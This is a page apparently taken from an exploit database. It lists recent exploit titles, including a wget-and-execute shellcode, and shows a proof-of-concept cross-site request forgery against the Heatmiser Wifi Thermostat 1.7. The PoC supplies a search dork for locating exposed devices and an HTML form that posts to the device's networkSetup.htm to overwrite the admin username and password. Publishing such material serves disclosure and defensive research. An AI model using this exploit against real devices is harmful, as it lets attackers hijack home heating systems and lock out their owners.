
10 changes to exploits/shellcodes Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory. Denial of Service (PoC) Microsoft Office SharePoint Server 2016 - Denial of Service (Metasploit) polkit - Temporary auth Hijacking via PID Reuse and Non-atomic Fork Microsoft Windows - Windows Error Reporting Local Privilege Escalation Microsoft Windows - DSSVC CheckFilePermission Arbitrary File Deletion MDwiki < 0.6.2 - Cross-Site Scripting Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery (Update Admin) ZTE MF65 BD_HDV6MF65V1.0.0B05 - Cross-Site Scripting BlogEngine 3.3 - XML External Entity Injection Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)
17 lines
No EOL
870 B
Text
17 lines
No EOL
870 B
Text
# Exploit Title: Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery
|
|
# Dork: intitle:"Heatmiser Wifi Thermostat" & you can use shodan
|
|
# Date: 2019-01-09
|
|
# Exploit Author: sajjadbnd
|
|
# Vendor Lnk: https://www.heatmiser.com/en/
|
|
# Product Link: https://www.heatmiser.com/en/wireless-thermostats/
|
|
# Tested on: Heatmiser Version 1.7
|
|
# CVE: N/A
|
|
|
|
# [+] CSRF: Change Admin Username and Password
|
|
|
|
<form method="post" name="config" action="http://target:8083/networkSetup.htm">
|
|
Name:<input type="text" name="usnm" maxlength="16" value="s" onchange="textchange()">
|
|
Password:<input type="password" maxlength="16" style="width:150px;" name="usps" >
|
|
Confirm User Password:<input type="password" maxlength="16" style="width:150px;" name="cfps" onchange="textchange()">
|
|
<input id="btnSubmit" type="submit" class="sm" value=" Save " onclick="saveclick()">
|
|
</form> |